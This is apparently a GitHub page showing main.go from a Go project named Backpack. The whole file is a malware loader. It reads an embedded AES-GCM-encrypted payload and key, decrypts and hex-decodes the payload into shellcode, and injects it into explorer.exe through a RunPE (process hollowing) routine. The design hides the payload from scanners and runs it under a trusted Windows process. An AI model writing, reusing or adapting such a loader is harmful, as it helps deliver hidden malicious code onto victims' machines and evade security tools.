-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathmain.go
38 lines (32 loc) · 838 Bytes
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
package main
import (
"crypto/aes"
"crypto/cipher"
_ "embed"
"encoding/hex"
"github.com/Enelg52/Backpack/runpe"
)
//https://pkg.go.dev/embed
//go:embed key.txt
var k string
//go:embed pe.txt
var s string
func main() {
key := []byte(k)
src := "C:\\Windows\\explorer.exe"
//change the console value to false if you don't want a new window
console := true
payload, _ := decrypt([]byte(s), key)
shellcode, err := hex.DecodeString(string(payload))
runpe.CheckErr(err)
runpe.Inject(src, shellcode, console)
}
func decrypt(cypherText []byte, key []byte) ([]byte, error) {
block, err := aes.NewCipher(key)
runpe.CheckErr(err)
gcm, err := cipher.NewGCM(block)
runpe.CheckErr(err)
plainText, err := gcm.Open(nil, cypherText[:gcm.NonceSize()], cypherText[gcm.NonceSize():], nil)
runpe.CheckErr(err)
return plainText, nil
}